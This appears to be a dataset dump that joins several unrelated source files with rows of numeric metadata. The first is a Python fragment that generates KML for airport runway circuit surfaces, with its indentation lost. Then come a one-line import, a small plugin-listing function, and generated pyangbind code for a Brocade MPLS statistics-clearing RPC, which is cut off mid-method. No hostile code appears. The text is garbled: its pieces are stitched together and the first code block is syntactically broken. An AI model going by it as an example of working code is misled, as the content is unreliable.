f.write('<styleUrl>#msn_ylw-pushpin</styleUrl>\n')
f.write('<ExtendedData>\n')
f.write('<SchemaData schemaUrl="#NewFeatureType">\n')
f.write('<SimpleData name="Surface">Dimensions</SimpleData>\n')
f.write('<SimpleData name="'+OlsSurf+'">-</SimpleData>\n')
f.write('</SchemaData>\n')
f.write('</ExtendedData>\n')
f.write('</ScreenOverlay>\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '<name>'+OlsSurf+'</name>\n')
## f.write('<open>1</open>\n')
hero = []
ns = 'n'
xxx = [s,t]
for l in range(len(xxx)):
xx = xxx[l]
for b in range(len(xx)):
f.write( """<Placemark>
<name>Untitled Path</name>
<styleUrl>#msn_ylw-pushpin</styleUrl>
<LineString>
<tessellate>1</tessellate>
<coordinates>""")
for h in range(len(xx[b])):
e = RED+xx[b][h][2]
Utm = mdl.toUTM(NTE,NTN,STE,STN,ARP,SE,NE,xx[b][h][0],xx[b][h][1],xx[b][h][2],ns)
Wgs = list(mdl.U_W(Utm[0],Utm[1],zone, e))
if n == 0:
if b == 0 or b == 1:
f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
if n == 1:
if b == 2 or b == 3:
f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
f.write( "\n")
f.write( """</coordinates>
</LineString>
</Placemark>""")
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '</Folder>\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
def SCirc(accur):
s = []
StraightCurv = 's'
Square = []
count = 0
ct = 0
for aye in range(2): #cats
for line in range(2): #in n out
I = range(int(1+math.ceil(getParPerp(line,aye,'lenth',StraightCurv)/accur)))
L = []
for j in I:
par = accur*j
if par >= getParPerp(line,aye,'lenth',StraightCurv):
par = getParPerp(line,aye,'lenth',StraightCurv)
perp = getParPerp(line,aye,'parr',StraightCurv)
perp = -1*perp
Z=SE
L.append([par,perp,Z])
s.append(L)
t=[]
StraightCurv = 'c'
for aye in range(2):
for line in range(2): #near or far
Curvs1 = 2*math.pi*(getParPerp(line,aye,'parr',StraightCurv)/2/2) / accur
Curvs = range(1+int(math.ceil(Curvs1)))
K = []
for j in Curvs:
angle=j*180/Curvs1
if angle >= 180:
angle = 180
if line == 0:
par = (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin\
(\
math.radians\
(\
(-1)*angle\
)\
))
elif line == 1:
par = getParPerp(line,aye,'lenth',StraightCurv) + (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin\
(\
math.radians\
(\
angle\
)\
))
if line == 0:
perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
if angle >= 90:
perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
elif line == 1:
perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par- getParPerp(line,aye,'lenth',StraightCurv))*(par- getParPerp(line,aye,'lenth',StraightCurv)))) \
+ getParPerp(line,aye,'parr',StraightCurv)/2
if angle >= 90:
perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par - getParPerp(line,aye,'lenth',StraightCurv))*(par - getParPerp(line,aye,'lenth',StraightCurv)))) \
+ getParPerp(line,aye,'parr',StraightCurv)/2
perp = -1*perp
Z=NE
K.append([par,perp,Z])
t.append(K)
F = [1,-1]
for n in range(2):
if n == 0:
OlsSurf = 'Runway 30 Cat A / B Circuit'
if n == 1:
OlsSurf = 'Runway 30 Cat C Circuit'
f.write( '<Folder>\n')
f.write( '<ScreenOverlay>\n')
f.write( '<name>Runway: Code '+str(int(CN))+CL+NRunwayInfo+'</name>\n')
f.write( '<visibility>0</visibility>\n')
f.write('<overlayXY x="0" y="0" xunits="fraction" yunits="fraction"/>\n')
f.write('<screenXY x="25" y="95" xunits="pixels" yunits="pixels"/>\n')
f.write('<rotationXY x="0.5" y="0.5" xunits="fraction" yunits="fraction"/>\n')
f.write('<size x="0" y="0" xunits="pixels" yunits="pixels"/>\n')
f.write('<styleUrl>#msn_ylw-pushpin</styleUrl>\n')
f.write('<ExtendedData>\n')
f.write('<SchemaData schemaUrl="#NewFeatureType">\n')
f.write('<SimpleData name="Surface">Dimensions</SimpleData>\n')
f.write('<SimpleData name="'+OlsSurf+'">-</SimpleData>\n')
f.write('</SchemaData>\n')
f.write('</ExtendedData>\n')
f.write('</ScreenOverlay>\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '<name>'+OlsSurf+'</name>\n')
## f.write('<open>1</open>\n')
hero = []
ns = 's'
xxx = [s,t]
for l in range(len(xxx)):
xx = xxx[l]
for b in range(len(xx)):
f.write( """<Placemark>
<name>Untitled Path</name>
<styleUrl>#msn_ylw-pushpin</styleUrl>
<LineString>
<tessellate>1</tessellate>
<coordinates>""")
for h in range(len(xx[b])):
e = RED+xx[b][h][2]
Utm = mdl.toUTM(NTE,NTN,STE,STN,ARP,SE,NE,xx[b][h][0],xx[b][h][1],xx[b][h][2],ns)
Wgs = list(mdl.U_W(Utm[0],Utm[1],zone, e))
if n == 0:
if b == 0 or b == 1:
f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
if n == 1:
if b == 2 or b == 3:
f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
f.write( "\n")
f.write( """</coordinates>
</LineString>
</Placemark>""")
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '</Folder>\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
f.write( '\n')
| 38.948276
| 244
| 0.448724
| 1,575
| 13,554
| 3.855238
| 0.106032
| 0.083004
| 0.083004
| 0.047431
| 0.8722
| 0.8722
| 0.8722
| 0.8722
| 0.863307
| 0.863307
| 0
| 0.029992
| 0.382544
| 13,554
| 347
| 245
| 39.060519
| 0.695543
| 0.017781
| 0
| 0.838906
| 0
| 0.006079
| 0.17177
| 0.036416
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009119
| false
| 0
| 0.015198
| 0
| 0.033435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
741749458300c606e5e5aff5895db73fd796a6fd
| 40
|
py
|
Python
|
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
from pycounts_rada import pycounts_rada
| 20
| 39
| 0.9
| 6
| 40
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7439a2470dff8bca49fe581f9918bfb4f46e14bf
| 187
|
py
|
Python
|
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | 5
|
2019-01-31T19:47:52.000Z
|
2019-03-06T09:44:47.000Z
|
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | null | null | null |
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | null | null | null |
from kirby.core.private.loader import _loaded_plugins as loaded_plugins
def get_all_available_plugins():
return list(filter(lambda plugin: plugin != '__pycache__', loaded_plugins))
| 31.166667
| 79
| 0.802139
| 25
| 187
| 5.56
| 0.76
| 0.280576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112299
| 187
| 5
| 80
| 37.4
| 0.837349
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
743bcb465f850e68b8d848bd33b056ddd15fb188
| 37,386
|
py
|
Python
|
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class input(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/clear-mpls-statistics/input. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__mpls_clear_statistics_type','__mpls_clear_statistics_transit_ldp_fec_prefix','__mpls_clear_statistics_transit_ldp_prefix_address','__mpls_clear_statistics_transit_ldp_prefix_mask','__mpls_clear_statistics_transit_label_id','__mpls_clear_statistics_tunnel_ldp_id','__mpls_clear_statistics_tunnel_rsvp_bypass','__mpls_clear_statistics_tunnel_name','__mpls_clear_statistics_tunnel_dest',)
_yang_name = 'input'
_rest_name = 'input'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__mpls_clear_statistics_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_clear_statistics_tunnel_ldp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_type = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_transit_ldp_prefix_mask = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
self.__mpls_clear_statistics_tunnel_rsvp_bypass = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__mpls_clear_statistics_tunnel_dest = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
self.__mpls_clear_statistics_transit_ldp_fec_prefix = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
self.__mpls_clear_statistics_transit_label_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_transit_ldp_prefix_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'clear-mpls-statistics', u'input']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'clear-mpls-statistics', u'input']
def _get_mpls_clear_statistics_type(self):
"""
Getter method for mpls_clear_statistics_type, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_type (uint32)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_type
def _set_mpls_clear_statistics_type(self, v, load=False):
"""
Setter method for mpls_clear_statistics_type, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_type (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_type() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_type must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_clear_statistics_type = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_type(self):
self.__mpls_clear_statistics_type = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_fec_prefix(self):
"""
Getter method for mpls_clear_statistics_transit_ldp_fec_prefix, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_fec_prefix (mpls-ipv4-prefix)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_transit_ldp_fec_prefix
def _set_mpls_clear_statistics_transit_ldp_fec_prefix(self, v, load=False):
"""
Setter method for mpls_clear_statistics_transit_ldp_fec_prefix, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_fec_prefix (mpls-ipv4-prefix)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_transit_ldp_fec_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_fec_prefix() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_transit_ldp_fec_prefix must be of a type compatible with mpls-ipv4-prefix""",
'defined-type': "brocade-mpls:mpls-ipv4-prefix",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)""",
})
self.__mpls_clear_statistics_transit_ldp_fec_prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_transit_ldp_fec_prefix(self):
self.__mpls_clear_statistics_transit_ldp_fec_prefix = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_prefix_address(self):
"""
Getter method for mpls_clear_statistics_transit_ldp_prefix_address, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_address (mpls-ipv4-address)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_transit_ldp_prefix_address
def _set_mpls_clear_statistics_transit_ldp_prefix_address(self, v, load=False):
"""
Setter method for mpls_clear_statistics_transit_ldp_prefix_address, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_address (mpls-ipv4-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_transit_ldp_prefix_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_prefix_address() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_transit_ldp_prefix_address must be of a type compatible with mpls-ipv4-address""",
'defined-type': "brocade-mpls:mpls-ipv4-address",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)""",
})
self.__mpls_clear_statistics_transit_ldp_prefix_address = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_transit_ldp_prefix_address(self):
self.__mpls_clear_statistics_transit_ldp_prefix_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_prefix_mask(self):
"""
Getter method for mpls_clear_statistics_transit_ldp_prefix_mask, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_mask (mpls-ipv4-subnet-mask)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_transit_ldp_prefix_mask
def _set_mpls_clear_statistics_transit_ldp_prefix_mask(self, v, load=False):
"""
Setter method for mpls_clear_statistics_transit_ldp_prefix_mask, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_mask (mpls-ipv4-subnet-mask)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_transit_ldp_prefix_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_prefix_mask() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_transit_ldp_prefix_mask must be of a type compatible with mpls-ipv4-subnet-mask""",
'defined-type': "brocade-mpls:mpls-ipv4-subnet-mask",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)""",
})
self.__mpls_clear_statistics_transit_ldp_prefix_mask = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_transit_ldp_prefix_mask(self):
